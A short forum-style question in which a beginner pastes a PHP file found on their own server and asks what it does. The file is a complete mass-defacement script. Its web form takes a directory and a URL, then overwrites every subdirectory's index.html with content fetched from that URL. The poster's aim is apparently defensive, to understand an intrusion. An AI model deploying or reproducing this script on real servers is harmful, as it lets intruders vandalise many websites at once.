I'm a beginner in the area and found this file inside my server:
<?php
/*
Script: Mass Deface Script
*/
echo "<center><textarea rows='10' cols='100'>";
$defaceurl = $_POST['massdefaceurl'];
$dir = $_POST['massdefacedir'];
echo $dir."\n";
if (is_dir($dir)) {
if ($dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir.$file)=="dir"){
$newfile=$dir.$file."/index.html";
echo $newfile."\n";
if (!copy($defaceurl, $newfile)) {
echo "failed to copy $file...\n";
}
}
}
closedir($dh);
}
}
echo "</textarea></center>";
?>
<td align=right>Mass Defacement:</td><br>
</div>
<form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
<div class="style31">
[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo getcwd() . "/"; ?>' name='massdefacedir'>
[+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'>
<input type='submit' name='execmassdeface' value='Execute'></div>
</form></td>
Can you help me understand what this file was running?